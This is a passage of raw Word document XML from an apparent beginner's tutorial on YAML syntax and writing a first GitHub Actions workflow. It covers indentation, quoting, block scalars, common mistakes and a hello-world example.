        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Use spaces, never tabs. Pick two spaces per level and stay consistent. The indentation literally defines which thing is nested inside which.</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                     # 2 spaces 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   # 4 spaces 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echo hi         # 6 spaces in</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Key-value pairs use colon-space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CI</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runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">That space after the colon is required. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">name:CI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> won't parse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists use a leading dash</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branches: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main</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develop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When the list items are themselves maps (like workflow steps), each item starts with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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Checkout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Test</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npm test</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Strings: quote when in doubt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of the time, plain strings just work:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="2"/>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My Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">But quote anything that contains special characters or looks like another type. This bites a lot of beginners:</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cron: '0 3 * *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version: '3.10'     # without quotes YAML reads this as the number 3.1</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Multiline strings: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">YAML gives you two ways to write a value that spans several lines, and they behave very differently. Pick the wrong one and your shell script collapses into one giant line that fails in confusing ways.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`|` (literal block scalar)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — preserves every line break exactly as you wrote it. The result is multi-line. This is what you want for shell scripts:</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Run several commands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"line one runs first"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"line two runs second"</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./scripts/build.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">`&gt;` (folded block scalar)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — replaces every line break with a single space, producing one long string. Useful for prose-style values where you want to wrap a long sentence in your YAML for readability but the value itself should be one line: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Set a long description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&gt;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this entire block</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becomes one</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single line of text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule of thumb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">: shell commands → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Anything else → you probably don't need it; just write it on one line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Anything after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a line is ignored:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="4" w:space="2"/>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runs-on: ubuntu-latest   # GitHub-hosted Ubuntu</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The mistakes that will bite you</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the ones I see beginners hit, over and over. Keep them in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Mistake</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What happens</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Fix</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Mixing tabs and spaces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"mapping values are not allowed here"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Spaces only. Configure your editor.</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No space after </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserv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Parse error</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key: value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, not </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">key:value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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Inconsistent indentation</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Keys silently vanish</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Pick two spaces, stick to it.</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Unquoted version numbers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3.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> becomes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1</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Quote it: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">'3.10'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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Missing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> on list items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Only the last item wins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Every list item needs its own </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:fill="F4F4F4" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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4. Your first workflow (and what you'll see after)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's build the smallest workflow that works, so you have something real to look at.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Create the file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In your repo, create </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/hello.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preser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Hello World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greet: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Say hello</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echo "Hello, world!"</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What this file actually says</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Read it left to right, top to bottom:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">name: Hello World</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the friendly name you'll see in the Actions tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">on: [push]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the trigger. Every time </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">anyone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> pushes a commit to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch in this repo, this workflow fires. So pushing to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, pushing to a feature branch, or merging a PR (which results in a push to the target branch) all trigger it. We'll narrow this later — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">on: { push: { branches: [main] } }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> would only fire on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — start of the jobs list. We have one job called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">greet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">runs-on: ubuntu-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — run this job on a fresh GitHub-hosted Ubuntu VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">steps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the work this job does. One step here, named "Say hello", which runs a shell command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">That's the whole file. The shape never gets more complicated than that — only longer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Commit and push</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git add .github/workflows/hello.yml</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git commit -m "Add hello workflow"</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git push</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Step 3 — Watch it run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Open your repository on GitHub, click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab, and you'll see your workflow running. Click into it and you can see the logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">That's the full cycle. You just automated something. Useless, but still — the shape of this file is the shape of every workflow you'll ever write. Everything else is just more of the same.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Actions UI, in a quick tour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180" w:before="180"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2714625"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="ui-layout.png" descr="ui-layout.png" title="ui-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14625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
